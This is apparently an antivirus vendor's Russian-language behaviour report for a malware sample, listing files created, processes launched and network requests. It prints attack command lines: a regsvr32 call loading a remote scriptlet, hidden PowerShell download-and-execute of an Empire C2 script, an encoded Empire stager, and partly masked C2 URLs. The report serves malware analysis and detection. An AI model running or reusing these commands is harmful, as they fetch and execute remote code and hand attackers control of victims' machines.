Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\regsvr32.exe' /n /s /i:http://ec#############173.eu-central-1.compute.amazonaws.com/s1activeX.sct scrobj.dll
Изменения в файловой системе
Создает следующие файлы
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f1b1f187b75f3323eded2ce37ea4cd8c_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Сетевая активность
TCP
Запросы HTTP GET
- http://ec#############173.eu-central-1.compute.amazonaws.com/s1activeX.sct
- http://s2.#atp.me/empireC2.ps1
- http://52.##6.221.13/admin/get.php
- http://52.##6.221.13/login/process.php
- http://52.##6.221.13/news.php
UDP
- DNS ASK ec#############173.eu-central-1.compute.amazonaws.com
- DNS ASK s2.#atp.me
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\regsvr32.exe' /n /s /i:http://ec#############173.eu-central-1.compute.amazonaws.com/s1activeX.sct scrobj.dll' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c $r=new-object net.webclient;$r.proxy=[Net.WebRequest]::GetSystemWebProxy();$r.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $r.downloadstring('http://s2.#atp...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c $r=new-object net.webclient;$r.proxy=[Net.WebRequest]::GetSystemWebProxy();$r.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $r.downloadstring('http://s2.#atp...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBpAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAUwBJAG8ATgAuAE0AYQBqAE8AUgAgAC0AZwBlACAAMwApAHsAJAA5ADMAOQA9AFsAUgBFAGYAXQAuAEEAUwBTAGUATQBiAEwAWQAuAEcARQBUA...
